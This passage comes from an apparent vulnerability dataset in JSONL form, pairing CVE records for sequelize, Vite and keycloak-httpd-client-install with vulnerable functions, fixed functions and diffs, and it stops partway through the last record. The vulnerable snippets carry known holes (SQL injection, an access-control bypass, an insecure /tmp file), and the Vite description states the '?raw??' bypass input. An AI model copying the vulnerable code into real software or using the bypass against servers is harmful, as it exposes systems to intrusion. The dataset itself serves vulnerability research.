Made user {0} a sysadmin\".format(name))\n+\n+ # cleanup permissions\n+ # We're running as root before pivoting to uwsgi and dropping privs\n+ data_dir = \"%s/storage\" % os.environ['CKAN_STORAGE_PATH']\n+\n+ command = [\"chown\", \"-R\", \"ckan:ckan\", data_dir]\n+ subprocess.call(command)\n+ print(\"[prerun] Ensured storage directory is owned by ckan\")\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2019-10749", "cve_description": "sequelize before version 3.35.1 
allows attackers to perform a SQL Injection due to the JSON path keys not being properly sanitized in the Postgres dialect.", "cwe_info": {"CWE-89": {"name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')", "description": "The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data."}}, "repo": "https://github.com/sequelize/sequelize", "patch_url": ["https://github.com/sequelize/sequelize/commit/ee4017379db0059566ecb5424274ad4e2d66bc68"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_209_1", "commit": "75c1fdb", "file_path": "lib/dialects/abstract/query-generator.js", "start_line": 2187, "end_line": 2209, "snippet": " traverse = function (prop, item, path) {\n var $where = {}\n , $key\n , $cast\n , $baseKey\n , $tmp\n , castKey;\n\n if (path[path.length - 1].indexOf('::') > -1) {\n $tmp = path[path.length - 1].split('::');\n $cast = $tmp[1];\n path[path.length - 1] = $tmp[0];\n }\n\n $baseKey = self.quoteIdentifier(key)+'#>>\\'{'+path.join(', ')+'}\\'';\n\n if (options.prefix) {\n if (options.prefix instanceof Utils.literal) {\n $baseKey = self.handleSequelizeMethod(options.prefix)+'.'+$baseKey;\n } else {\n $baseKey = self.quoteTable(options.prefix)+'.'+$baseKey;\n }\n }"}], "fix_func": [{"id": "fix_js_209_1", "commit": "ee4017379db0059566ecb5424274ad4e2d66bc68", "file_path": "lib/dialects/abstract/query-generator.js", "start_line": 2187, "end_line": 2210, "snippet": " traverse = function (prop, item, path) {\n var $where = {}\n , $key\n , $cast\n , $baseKey\n , $tmp\n , castKey;\n\n if (path[path.length - 1].indexOf('::') > -1) {\n $tmp = path[path.length - 1].split('::');\n $cast = $tmp[1];\n path[path.length - 1] = $tmp[0];\n }\n\n var pathKey = self.escape('{' + path.join(', ') + '}');\n $baseKey = self.quoteIdentifier(key)+'#>>'+pathKey;\n\n if (options.prefix) {\n if (options.prefix instanceof Utils.literal) {\n $baseKey = self.handleSequelizeMethod(options.prefix)+'.'+$baseKey;\n } else {\n $baseKey = self.quoteTable(options.prefix)+'.'+$baseKey;\n }\n }"}], "vul_patch": "--- a/lib/dialects/abstract/query-generator.js\n+++ b/lib/dialects/abstract/query-generator.js\n@@ -12,7 +12,8 @@\n path[path.length - 1] = $tmp[0];\n }\n \n- $baseKey = self.quoteIdentifier(key)+'#>>\\'{'+path.join(', ')+'}\\'';\n+ var pathKey = self.escape('{' + path.join(', ') + '}');\n+ $baseKey = self.quoteIdentifier(key)+'#>>'+pathKey;\n \n if (options.prefix) {\n if (options.prefix instanceof Utils.literal) {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2025-30208", "cve_description": "Vite, a provider of frontend development tooling, has a vulnerability in versions prior to 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10. `@fs` denies access to files outside of Vite serving allow list. Adding `?raw??` or `?import&raw??` to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as `?` are removed in several places, but are not accounted for in query string regexes. The contents of arbitrary files can be returned to the browser. 
Only apps explicitly exposing the Vite dev server to the network (using `--host` or `server.host` config option) are affected. Versions 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10 fix the issue.", "cwe_info": {"CWE-284": {"name": "Improper Access Control", "description": "The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor."}}, "repo": "https://github.com/vitejs/vite", "patch_url": ["https://github.com/vitejs/vite/commit/315695e9d97cc6cfa7e6d9e0229fb50cdae3d9f4"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_248_1", "commit": "50641d9", "file_path": "packages/vite/src/node/server/middlewares/transform.ts", "start_line": 57, "end_line": 279, "snippet": " return async function viteTransformMiddleware(req, res, next) {\n if (req.method !== 'GET' || knownIgnoreList.has(req.url!)) {\n return next()\n }\n\n let url: string\n try {\n url = decodeURI(removeTimestampQuery(req.url!)).replace(\n NULL_BYTE_PLACEHOLDER,\n '\\0',\n )\n } catch (e) {\n return next(e)\n }\n\n const withoutQuery = cleanUrl(url)\n\n try {\n const isSourceMap = withoutQuery.endsWith('.map')\n // since we generate source map references, handle those requests here\n if (isSourceMap) {\n const depsOptimizer = getDepsOptimizer(server.config, false) // non-ssr\n if (depsOptimizer?.isOptimizedDepUrl(url)) {\n // If the browser is requesting a source map for an optimized dep, it\n // means that the dependency has already been pre-bundled and loaded\n const sourcemapPath = url.startsWith(FS_PREFIX)\n ? fsPathFromId(url)\n : normalizePath(path.resolve(root, url.slice(1)))\n try {\n const map = JSON.parse(\n await fsp.readFile(sourcemapPath, 'utf-8'),\n ) as ExistingRawSourceMap\n\n applySourcemapIgnoreList(\n map,\n sourcemapPath,\n server.config.server.sourcemapIgnoreList,\n logger,\n )\n\n return send(req, res, JSON.stringify(map), 'json', {\n headers: server.config.server.headers,\n })\n } catch (e) {\n // Outdated source map request for optimized deps, this isn't an error\n // but part of the normal flow when re-optimizing after missing deps\n // Send back an empty source map so the browser doesn't issue warnings\n const dummySourceMap = {\n version: 3,\n file: sourcemapPath.replace(/\\.map$/, ''),\n sources: [],\n sourcesContent: [],\n names: [],\n mappings: ';;;;;;;;;',\n }\n return send(req, res, JSON.stringify(dummySourceMap), 'json', {\n cacheControl: 'no-cache',\n headers: server.config.server.headers,\n })\n }\n } else {\n const originalUrl = url.replace(/\\.map($|\\?)/, '$1')\n const map = (await moduleGraph.getModuleByUrl(originalUrl, false))\n ?.transformResult?.map\n if (map) {\n return send(req, res, JSON.stringify(map), 'json', {\n headers: server.config.server.headers,\n })\n } else {\n return next()\n }\n }\n }\n\n // check if public dir is inside root dir\n const publicDir = normalizePath(server.config.publicDir)\n const rootDir = normalizePath(server.config.root)\n if (publicDir.startsWith(withTrailingSlash(rootDir))) {\n const publicPath = `${publicDir.slice(rootDir.length)}/`\n // warn explicit public paths\n if (url.startsWith(withTrailingSlash(publicPath))) {\n let warning: string\n\n if (isImportRequest(url)) {\n const rawUrl = removeImportQuery(url)\n if (urlRE.test(url)) {\n warning =\n `Assets in the public directory are served at the root path.\\n` +\n `Instead of ${colors.cyan(rawUrl)}, use ${colors.cyan(\n rawUrl.replace(publicPath, '/'),\n )}.`\n } else {\n warning =\n 'Assets in public directory cannot be imported from 
JavaScript.\\n' +\n `If you intend to import that asset, put the file in the src directory, and use ${colors.cyan(\n rawUrl.replace(publicPath, '/src/'),\n )} instead of ${colors.cyan(rawUrl)}.\\n` +\n `If you intend to use the URL of that asset, use ${colors.cyan(\n injectQuery(rawUrl.replace(publicPath, '/'), 'url'),\n )}.`\n }\n } else {\n warning =\n `files in the public directory are served at the root path.\\n` +\n `Instead of ${colors.cyan(url)}, use ${colors.cyan(\n url.replace(publicPath, '/'),\n )}.`\n }\n\n logger.warn(colors.yellow(warning))\n }\n }\n\n if (\n (rawRE.test(url) || urlRE.test(url)) &&\n !ensureServingAccess(url, server, res, next)\n ) {\n return\n }\n\n if (\n isJSRequest(url) ||\n isImportRequest(url) ||\n isCSSRequest(url) ||\n isHTMLProxy(url)\n ) {\n // strip ?import\n url = removeImportQuery(url)\n // Strip valid id prefix. This is prepended to resolved Ids that are\n // not valid browser import specifiers by the importAnalysis plugin.\n url = unwrapId(url)\n\n // for CSS, we need to differentiate between normal CSS requests and\n // imports\n if (\n isCSSRequest(url) &&\n !isDirectRequest(url) &&\n req.headers.accept?.includes('text/css')\n ) {\n url = injectQuery(url, 'direct')\n }\n\n // check if we can return 304 early\n const ifNoneMatch = req.headers['if-none-match']\n if (\n ifNoneMatch &&\n (await moduleGraph.getModuleByUrl(url, false))?.transformResult\n ?.etag === ifNoneMatch\n ) {\n debugCache?.(`[304] ${prettifyUrl(url, root)}`)\n res.statusCode = 304\n return res.end()\n }\n\n // resolve, load and transform using the plugin container\n const result = await transformRequest(url, server, {\n html: req.headers.accept?.includes('text/html'),\n })\n if (result) {\n const depsOptimizer = getDepsOptimizer(server.config, false) // non-ssr\n const type = isDirectCSSRequest(url) ? 'css' : 'js'\n const isDep =\n DEP_VERSION_RE.test(url) || depsOptimizer?.isOptimizedDepUrl(url)\n return send(req, res, result.code, type, {\n etag: result.etag,\n // allow browser to cache npm deps!\n cacheControl: isDep ? 'max-age=31536000,immutable' : 'no-cache',\n headers: server.config.server.headers,\n map: result.map,\n })\n }\n }\n } catch (e) {\n if (e?.code === ERR_OPTIMIZE_DEPS_PROCESSING_ERROR) {\n // Skip if response has already been sent\n if (!res.writableEnded) {\n res.statusCode = 504 // status code request timeout\n res.statusMessage = 'Optimize Deps Processing Error'\n res.end()\n }\n // This timeout is unexpected\n logger.error(e.message)\n return\n }\n if (e?.code === ERR_OUTDATED_OPTIMIZED_DEP) {\n // Skip if response has already been sent\n if (!res.writableEnded) {\n res.statusCode = 504 // status code request timeout\n res.statusMessage = 'Outdated Optimize Dep'\n res.end()\n }\n // We don't need to log an error in this case, the request\n // is outdated because new dependencies were discovered and\n // the new pre-bundle dependencies have changed.\n // A full-page reload has been issued, and these old requests\n // can't be properly fulfilled. 
This isn't an unexpected\n // error but a normal part of the missing deps discovery flow\n return\n }\n if (e?.code === ERR_CLOSED_SERVER) {\n // Skip if response has already been sent\n if (!res.writableEnded) {\n res.statusCode = 504 // status code request timeout\n res.statusMessage = 'Outdated Request'\n res.end()\n }\n // We don't need to log an error in this case, the request\n // is outdated because new dependencies were discovered and\n // the new pre-bundle dependencies have changed.\n // A full-page reload has been issued, and these old requests\n // can't be properly fulfilled. This isn't an unexpected\n // error but a normal part of the missing deps discovery flow\n return\n }\n if (e?.code === ERR_LOAD_URL) {\n // Let other middleware handle if we can't load the url via transformRequest\n return next()\n }\n return next(e)\n }\n\n next()\n }"}], "fix_func": [{"id": "fix_js_248_1", "commit": "315695e9d97cc6cfa7e6d9e0229fb50cdae3d9f4", "file_path": "packages/vite/src/node/server/middlewares/transform.ts", "start_line": 58, "end_line": 290, "snippet": " return async function viteTransformMiddleware(req, res, next) {\n if (req.method !== 'GET' || knownIgnoreList.has(req.url!)) {\n return next()\n }\n\n let url: string\n try {\n url = decodeURI(removeTimestampQuery(req.url!)).replace(\n NULL_BYTE_PLACEHOLDER,\n '\\0',\n )\n } catch (e) {\n return next(e)\n }\n\n const withoutQuery = cleanUrl(url)\n\n try {\n const isSourceMap = withoutQuery.endsWith('.map')\n // since we generate source map references, handle those requests here\n if (isSourceMap) {\n const depsOptimizer = getDepsOptimizer(server.config, false) // non-ssr\n if (depsOptimizer?.isOptimizedDepUrl(url)) {\n // If the browser is requesting a source map for an optimized dep, it\n // means that the dependency has already been pre-bundled and loaded\n const sourcemapPath = url.startsWith(FS_PREFIX)\n ? 
fsPathFromId(url)\n : normalizePath(path.resolve(root, url.slice(1)))\n try {\n const map = JSON.parse(\n await fsp.readFile(sourcemapPath, 'utf-8'),\n ) as ExistingRawSourceMap\n\n applySourcemapIgnoreList(\n map,\n sourcemapPath,\n server.config.server.sourcemapIgnoreList,\n logger,\n )\n\n return send(req, res, JSON.stringify(map), 'json', {\n headers: server.config.server.headers,\n })\n } catch (e) {\n // Outdated source map request for optimized deps, this isn't an error\n // but part of the normal flow when re-optimizing after missing deps\n // Send back an empty source map so the browser doesn't issue warnings\n const dummySourceMap = {\n version: 3,\n file: sourcemapPath.replace(/\\.map$/, ''),\n sources: [],\n sourcesContent: [],\n names: [],\n mappings: ';;;;;;;;;',\n }\n return send(req, res, JSON.stringify(dummySourceMap), 'json', {\n cacheControl: 'no-cache',\n headers: server.config.server.headers,\n })\n }\n } else {\n const originalUrl = url.replace(/\\.map($|\\?)/, '$1')\n const map = (await moduleGraph.getModuleByUrl(originalUrl, false))\n ?.transformResult?.map\n if (map) {\n return send(req, res, JSON.stringify(map), 'json', {\n headers: server.config.server.headers,\n })\n } else {\n return next()\n }\n }\n }\n\n // check if public dir is inside root dir\n const publicDir = normalizePath(server.config.publicDir)\n const rootDir = normalizePath(server.config.root)\n if (publicDir.startsWith(withTrailingSlash(rootDir))) {\n const publicPath = `${publicDir.slice(rootDir.length)}/`\n // warn explicit public paths\n if (url.startsWith(withTrailingSlash(publicPath))) {\n let warning: string\n\n if (isImportRequest(url)) {\n const rawUrl = removeImportQuery(url)\n if (urlRE.test(url)) {\n warning =\n `Assets in the public directory are served at the root path.\\n` +\n `Instead of ${colors.cyan(rawUrl)}, use ${colors.cyan(\n rawUrl.replace(publicPath, '/'),\n )}.`\n } else {\n warning =\n 'Assets in public directory cannot be imported from JavaScript.\\n' +\n `If you intend to import that asset, put the file in the src directory, and use ${colors.cyan(\n rawUrl.replace(publicPath, '/src/'),\n )} instead of ${colors.cyan(rawUrl)}.\\n` +\n `If you intend to use the URL of that asset, use ${colors.cyan(\n injectQuery(rawUrl.replace(publicPath, '/'), 'url'),\n )}.`\n }\n } else {\n warning =\n `files in the public directory are served at the root path.\\n` +\n `Instead of ${colors.cyan(url)}, use ${colors.cyan(\n url.replace(publicPath, '/'),\n )}.`\n }\n\n logger.warn(colors.yellow(warning))\n }\n }\n\n const urlWithoutTrailingQuerySeparators = url.replace(\n trailingQuerySeparatorsRE,\n '',\n )\n if (\n (rawRE.test(urlWithoutTrailingQuerySeparators) ||\n urlRE.test(urlWithoutTrailingQuerySeparators)) &&\n !ensureServingAccess(\n urlWithoutTrailingQuerySeparators,\n server,\n res,\n next,\n )\n ) {\n return\n }\n\n if (\n isJSRequest(url) ||\n isImportRequest(url) ||\n isCSSRequest(url) ||\n isHTMLProxy(url)\n ) {\n // strip ?import\n url = removeImportQuery(url)\n // Strip valid id prefix. 
This is prepended to resolved Ids that are\n // not valid browser import specifiers by the importAnalysis plugin.\n url = unwrapId(url)\n\n // for CSS, we need to differentiate between normal CSS requests and\n // imports\n if (\n isCSSRequest(url) &&\n !isDirectRequest(url) &&\n req.headers.accept?.includes('text/css')\n ) {\n url = injectQuery(url, 'direct')\n }\n\n // check if we can return 304 early\n const ifNoneMatch = req.headers['if-none-match']\n if (\n ifNoneMatch &&\n (await moduleGraph.getModuleByUrl(url, false))?.transformResult\n ?.etag === ifNoneMatch\n ) {\n debugCache?.(`[304] ${prettifyUrl(url, root)}`)\n res.statusCode = 304\n return res.end()\n }\n\n // resolve, load and transform using the plugin container\n const result = await transformRequest(url, server, {\n html: req.headers.accept?.includes('text/html'),\n })\n if (result) {\n const depsOptimizer = getDepsOptimizer(server.config, false) // non-ssr\n const type = isDirectCSSRequest(url) ? 'css' : 'js'\n const isDep =\n DEP_VERSION_RE.test(url) || depsOptimizer?.isOptimizedDepUrl(url)\n return send(req, res, result.code, type, {\n etag: result.etag,\n // allow browser to cache npm deps!\n cacheControl: isDep ? 'max-age=31536000,immutable' : 'no-cache',\n headers: server.config.server.headers,\n map: result.map,\n })\n }\n }\n } catch (e) {\n if (e?.code === ERR_OPTIMIZE_DEPS_PROCESSING_ERROR) {\n // Skip if response has already been sent\n if (!res.writableEnded) {\n res.statusCode = 504 // status code request timeout\n res.statusMessage = 'Optimize Deps Processing Error'\n res.end()\n }\n // This timeout is unexpected\n logger.error(e.message)\n return\n }\n if (e?.code === ERR_OUTDATED_OPTIMIZED_DEP) {\n // Skip if response has already been sent\n if (!res.writableEnded) {\n res.statusCode = 504 // status code request timeout\n res.statusMessage = 'Outdated Optimize Dep'\n res.end()\n }\n // We don't need to log an error in this case, the request\n // is outdated because new dependencies were discovered and\n // the new pre-bundle dependencies have changed.\n // A full-page reload has been issued, and these old requests\n // can't be properly fulfilled. This isn't an unexpected\n // error but a normal part of the missing deps discovery flow\n return\n }\n if (e?.code === ERR_CLOSED_SERVER) {\n // Skip if response has already been sent\n if (!res.writableEnded) {\n res.statusCode = 504 // status code request timeout\n res.statusMessage = 'Outdated Request'\n res.end()\n }\n // We don't need to log an error in this case, the request\n // is outdated because new dependencies were discovered and\n // the new pre-bundle dependencies have changed.\n // A full-page reload has been issued, and these old requests\n // can't be properly fulfilled. 
This isn't an unexpected\n // error but a normal part of the missing deps discovery flow\n return\n }\n if (e?.code === ERR_LOAD_URL) {\n // Let other middleware handle if we can't load the url via transformRequest\n return next()\n }\n return next(e)\n }\n\n next()\n }"}, {"id": "fix_js_248_2", "commit": "315695e9d97cc6cfa7e6d9e0229fb50cdae3d9f4", "file_path": "packages/vite/src/node/server/middlewares/transform.ts", "start_line": 47, "end_line": 47, "snippet": "const trailingQuerySeparatorsRE = /[?&]+$/"}], "vul_patch": "--- a/packages/vite/src/node/server/middlewares/transform.ts\n+++ b/packages/vite/src/node/server/middlewares/transform.ts\n@@ -111,9 +111,19 @@\n }\n }\n \n+ const urlWithoutTrailingQuerySeparators = url.replace(\n+ trailingQuerySeparatorsRE,\n+ '',\n+ )\n if (\n- (rawRE.test(url) || urlRE.test(url)) &&\n- !ensureServingAccess(url, server, res, next)\n+ (rawRE.test(urlWithoutTrailingQuerySeparators) ||\n+ urlRE.test(urlWithoutTrailingQuerySeparators)) &&\n+ !ensureServingAccess(\n+ urlWithoutTrailingQuerySeparators,\n+ server,\n+ res,\n+ next,\n+ )\n ) {\n return\n }\n\n--- /dev/null\n+++ b/packages/vite/src/node/server/middlewares/transform.ts\n@@ -0,0 +1 @@\n+const trailingQuerySeparatorsRE = /[?&]+$/\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2017-15111", "cve_description": "keycloak-httpd-client-install versions before 0.8 insecurely creates temporary file allowing local attackers to overwrite other files via symbolic link.", "cwe_info": {"CWE-59": {"name": "Improper Link Resolution Before File Access ('Link Following')", "description": "The product attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource."}}, "repo": "https://github.com/jdennis/keycloak-httpd-client-install", "patch_url": ["https://github.com/jdennis/keycloak-httpd-client-install/commit/07f26e213196936fb328ea0c1d5a66a09d8b5440"], "programing_language": "Python", "vul_func": [{"id": "vul_py_84_1", "commit": "c3121b2", "file_path": "keycloak_httpd_client/keycloak_cli.py", "start_line": "846", "end_line": "1045", "snippet": "def main():\n global logger\n result = 0\n\n parser = argparse.ArgumentParser(description='Keycloak REST client',\n prog=prog_name,\n epilog=verbose_help.format(prog_name=prog_name),\n formatter_class=argparse.RawDescriptionHelpFormatter)\n\n parser.add_argument('-v', '--verbose', action='store_true',\n help='be chatty')\n\n parser.add_argument('-d', '--debug', action='store_true',\n help='turn on debug info')\n\n parser.add_argument('--show-traceback', action='store_true',\n help='exceptions print traceback in addition to '\n 'error message')\n\n parser.add_argument('--log-file',\n default='/tmp/{prog_name}.log'.format(\n prog_name=prog_name),\n help='log file pathname')\n\n parser.add_argument('--permit-insecure-transport', action='store_true',\n help='Normally secure transport such as TLS '\n 'is required, defeat this check')\n\n parser.add_argument('--tls-verify', action=TlsVerifyAction,\n default=True,\n help='TLS certificate verification for requests to'\n ' the server. 
May be one of case insenstive '\n '[true, yes, on] to enable,'\n '[false, no, off] to disable.'\n 'Or the pathname to a OpenSSL CA bundle to use.'\n ' Default is True.')\n\n group = parser.add_argument_group('Server')\n\n group.add_argument('-s', '--server',\n required=True,\n help='DNS name or IP address of Keycloak server')\n\n group.add_argument('-a', '--auth-role',\n choices=AUTH_ROLES,\n default='root-admin',\n help='authenticating as what type of user (default: root-admin)')\n\n group.add_argument('-u', '--admin-username',\n default='admin',\n help='admin user name (default: admin)')\n\n group.add_argument('-P', '--admin-password-file',\n type=argparse.FileType('rb'),\n help=('file containing admin password '\n '(or use a hyphen \"-\" to read the password '\n 'from stdin)'))\n\n group.add_argument('--admin-realm',\n default='master',\n help='realm admin belongs to')\n\n cmd_parsers = parser.add_subparsers(help='available commands')\n\n # --- realm commands ---\n realm_parser = cmd_parsers.add_parser('realm',\n help='realm operations')\n\n sub_parser = realm_parser.add_subparsers(help='realm commands')\n\n cmd_parser = sub_parser.add_parser('server_info',\n help='dump server info')\n cmd_parser.set_defaults(func=do_server_info)\n\n cmd_parser = sub_parser.add_parser('list',\n help='list realm names')\n cmd_parser.set_defaults(func=do_list_realms)\n\n cmd_parser = sub_parser.add_parser('create',\n help='create new realm')\n cmd_parser.add_argument('-r', '--realm-name', required=True,\n help='realm name')\n cmd_parser.set_defaults(func=do_create_realm)\n\n cmd_parser = sub_parser.add_parser('delete',\n help='delete existing realm')\n cmd_parser.add_argument('-r', '--realm-name', required=True,\n help='realm name')\n cmd_parser.set_defaults(func=do_delete_realm)\n\n cmd_parser = sub_parser.add_parser('metadata',\n help='retrieve realm metadata')\n cmd_parser.add_argument('-r', '--realm-name', required=True,\n help='realm name')\n cmd_parser.set_defaults(func=do_get_realm_metadata)\n\n # --- client commands ---\n client_parser = cmd_parsers.add_parser('client',\n help='client operations')\n\n sub_parser = client_parser.add_subparsers(help='client commands')\n\n cmd_parser = sub_parser.add_parser('list',\n help='list client names')\n cmd_parser.add_argument('-r', '--realm-name', required=True,\n help='realm name')\n\n cmd_parser.set_defaults(func=do_list_clients)\n\n cmd_parser = sub_parser.add_parser('create',\n help='create new client')\n cmd_parser.add_argument('-r', '--realm-name', required=True,\n help='realm name')\n cmd_parser.add_argument('-m', '--metadata', type=argparse.FileType('rb'),\n required=True,\n help='SP metadata file or stdin')\n cmd_parser.set_defaults(func=do_create_client)\n\n cmd_parser = sub_parser.add_parser('register',\n help='register new client')\n cmd_parser.add_argument('-r', '--realm-name', required=True,\n help='realm name')\n cmd_parser.add_argument('-m', '--metadata', type=argparse.FileType('rb'),\n required=True,\n help='SP metadata file or stdin')\n cmd_parser.add_argument('--initial-access-token', required=True,\n help='realm initial access token for '\n 'client registeration')\n cmd_parser.set_defaults(func=do_register_client)\n\n cmd_parser = sub_parser.add_parser('delete',\n help='delete existing client')\n cmd_parser.add_argument('-r', '--realm-name', required=True,\n help='realm name')\n cmd_parser.add_argument('-c', '--client-name', required=True,\n help='client name')\n cmd_parser.set_defaults(func=do_delete_client)\n\n cmd_parser = 
sub_parser.add_parser('test',\n help='experimental test used during '\n 'development')\n cmd_parser.add_argument('-r', '--realm-name', required=True,\n help='realm name')\n cmd_parser.add_argument('-c', '--client-name', required=True,\n help='client name')\n cmd_parser.set_defaults(func=do_client_test)\n\n # Process command line arguments\n options = parser.parse_args()\n configure_logging(options)\n\n if options.permit_insecure_transport:\n os.environ['OAUTHLIB_INSECURE_TRANSPORT'] = '1'\n\n # Get admin password\n options.admin_password = None\n\n # 1. Try password file\n if options.admin_password_file is not None:\n options.admin_password = options.keycloak_admin_password_file.readline().strip()\n options.keycloak_admin_password_file.close()\n\n # 2. Try KEYCLOAK_ADMIN_PASSWORD environment variable\n if options.admin_password is None:\n if (('KEYCLOAK_ADMIN_PASSWORD' in os.environ) and\n (os.environ['KEYCLOAK_ADMIN_PASSWORD'])):\n options.admin_password = os.environ['KEYCLOAK_ADMIN_PASSWORD']\n\n try:\n anonymous_conn = KeycloakAnonymousConnection(options.server,\n options.tls_verify)\n\n admin_conn = KeycloakAdminConnection(options.server,\n options.auth_role,\n options.admin_realm,\n ADMIN_CLIENT_ID,\n options.admin_username,\n options.admin_password,\n options.tls_verify)\n except Exception as e:\n if options.show_traceback:\n traceback.print_exc()\n print(six.text_type(e), file=sys.stderr)\n result = 1\n return result\n\n try:\n if options.func == do_register_client:\n conn = admin_conn\n else:\n conn = admin_conn\n result = options.func(options, conn)\n except Exception as e:\n if options.show_traceback:\n traceback.print_exc()\n print(six.text_type(e), file=sys.stderr)\n result = 2\n return result\n\n return result"}], "fix_func": [{"id": "fix_py_84_1", "commit": "07f26e2", "file_path": "keycloak_httpd_client/keycloak_cli.py", "start_line": "846", "end_line": "1045", "snippet": "def main():\n global logger\n result = 0\n\n parser = argparse.ArgumentParser(description='Keycloak REST client',\n prog=prog_name,\n epilog=verbose_help.format(prog_name=prog_name),\n formatter_class=argparse.RawDescriptionHelpFormatter)\n\n parser.add_argument('-v', '--verbose', action='store_true',\n help='be chatty')\n\n parser.add_argument('-d', '--debug', action='store_true',\n help='turn on debug info')\n\n parser.add_argument('--show-traceback', action='store_true',\n help='exceptions print traceback in addition to '\n 'error message')\n\n parser.add_argument('--log-file',\n default='{prog_name}.log'.format(\n prog_name=prog_name),\n help='log file pathname')\n\n parser.add_argument('--permit-insecure-transport', action='store_true',\n help='Normally secure transport such as TLS '\n 'is required, defeat this check')\n\n parser.add_argument('--tls-verify', action=TlsVerifyAction,\n default=True,\n help='TLS certificate verification for requests to'\n ' the server. 
May be one of case insenstive '\n '[true, yes, on] to enable,'\n '[false, no, off] to disable.'\n 'Or the pathname to a OpenSSL CA bundle to use.'\n ' Default is True.')\n\n group = parser.add_argument_group('Server')\n\n group.add_argument('-s', '--server',\n required=True,\n help='DNS name or IP address of Keycloak server')\n\n group.add_argument('-a', '--auth-role',\n choices=AUTH_ROLES,\n default='root-admin',\n help='authenticating as what type of user (default: root-admin)')\n\n group.add_argument('-u', '--admin-username',\n default='admin',\n help='admin user name (default: admin)')\n\n group.add_argument('-P', '--admin-password-file',\n type=argparse.FileType('rb'),\n help=('file containing admin password '\n '(or use a hyphen \"-\" to read the password '\n 'from stdin)'))\n\n group.add_argument('--admin-realm',\n default='master',\n help='realm admin belongs to')\n\n cmd_parsers = parser.add_subparsers(help='available commands')\n\n # --- realm commands ---\n realm_parser = cmd_parsers.add_parser('realm',\n help='realm operations')\n\n sub_parser = realm_parser.add_subparsers(help='realm commands')\n\n cmd_parser = sub_parser.add_parser('server_info',\n help='dump server info')\n cmd_parser.set_defaults(func=do_server_info)\n\n cmd_parser = sub_parser.add_parser('list',\n help='list realm names')\n cmd_parser.set_defaults(func=do_list_realms)\n\n cmd_parser = sub_parser.add_parser('create',\n help='create new realm')\n cmd_parser.add_argument('-r', '--realm-name', required=True,\n help='realm name')\n cmd_parser.set_defaults(func=do_create_realm)\n\n cmd_parser = sub_parser.add_parser('delete',\n help='delete existing realm')\n cmd_parser.add_argument('-r', '--realm-name', required=True,\n help='realm name')\n cmd_parser.set_defaults(func=do_delete_realm)\n\n cmd_parser = sub_parser.add_parser('metadata',\n help='retrieve realm metadata')\n cmd_parser.add_argument('-r', '--realm-name', required=True,\n help='realm name')\n cmd_parser.set_defaults(func=do_get_realm_metadata)\n\n # --- client commands ---\n client_parser = cmd_parsers.add_parser('client',\n help='client operations')\n\n sub_parser = client_parser.add_subparsers(help='client commands')\n\n cmd_parser = sub_parser.add_parser('list',\n help='list client names')\n cmd_parser.add_argument('-r', '--realm-name', required=True,\n help='realm name')\n\n cmd_parser.set_defaults(func=do_list_clients)\n\n cmd_parser = sub_parser.add_parser('create',\n help='create new client')\n cmd_parser.add_argument('-r', '--realm-name', required=True,\n help='realm name')\n cmd_parser.add_argument('-m', '--metadata', type=argparse.FileType('rb'),\n required=True,\n help='SP metadata file or stdin')\n cmd_parser.set_defaults(func=do_create_client)\n\n cmd_parser = sub_parser.add_parser('register',\n help='register new client')\n cmd_parser.add_argument('-r', '--realm-name', required=True,\n help='realm name')\n cmd_parser.add_argument('-m', '--metadata', type=argparse.FileType('rb'),\n required=True,\n help='SP metadata file or stdin')\n cmd_parser.add_argument('--initial-access-token', required=True,\n help='realm initial access token for '\n 'client registeration')\n cmd_parser.set_defaults(func=do_register_client)\n\n cmd_parser = sub_parser.add_parser('delete',\n help='delete existing client')\n cmd_parser.add_argument('-r', '--realm-name', required=True,\n help='realm name')\n cmd_parser.add_argument('-c', '--client-name', required=True,\n help='client name')\n cmd_parser.set_defaults(func=do_delete_client)\n\n cmd_parser = 
sub_parser.add_parser('test',\n help='experimental test used during '\n 'development')\n cmd_parser.add_argument('-r', '--realm-name', required=True,\n help='realm name')\n cmd_parser.add_argument('-c', '--client-name', required=True,\n help='client name')\n cmd_parser.set_defaults(func=do_client_test)\n\n # Process command line arguments\n options = parser.parse_args()\n configure_logging(options)\n\n if options.permit_insecure_transport:\n os.environ['OAUTHLIB_INSECURE_TRANSPORT'] = '1'\n\n # Get admin password\n options.admin_password = None\n\n # 1. Try password file\n if options.admin_password_file is not None:\n options.admin_password = options.keycloak_admin_password_file.readline().strip()\n options.keycloak_admin_password_file.close()\n\n # 2. Try KEYCLOAK_ADMIN_PASSWORD environment variable\n if options.admin_password is None:\n if (('KEYCLOAK_ADMIN_PASSWORD' in os.environ) and\n (os.environ['KEYCLOAK_ADMIN_PASSWORD'])):\n options.admin_password = os.environ['KEYCLOAK_ADMIN_PASSWORD']\n\n try:\n anonymous_conn = KeycloakAnonymousConnection(options.server,\n options.tls_verify)\n\n admin_conn = KeycloakAdminConnection(options.server,\n options.auth_role,\n options.admin_realm,\n ADMIN_CLIENT_ID,\n options.admin_username,\n options.admin_password,\n options.tls_verify)\n except Exception as e:\n if options.show_traceback:\n traceback.print_exc()\n print(six.text_type(e), file=sys.stderr)\n result = 1\n return result\n\n try:\n if options.func == do_register_client:\n conn = admin_conn\n else:\n conn = admin_conn\n result = options.func(options, conn)\n except Exception as e:\n if options.show_traceback:\n traceback.print_exc()\n print(six.text_type(e), file=sys.stderr)\n result = 2\n return result\n\n return result"}], "vul_patch": "--- a/keycloak_httpd_client/keycloak_cli.py\n+++ b/keycloak_httpd_client/keycloak_cli.py\n@@ -18,7 +18,7 @@\n 'error message')\n \n parser.add_argument('--log-file',\n- default='/tmp/{prog_name}.log'.format(\n+ default='{prog_name}.log'.format(\n 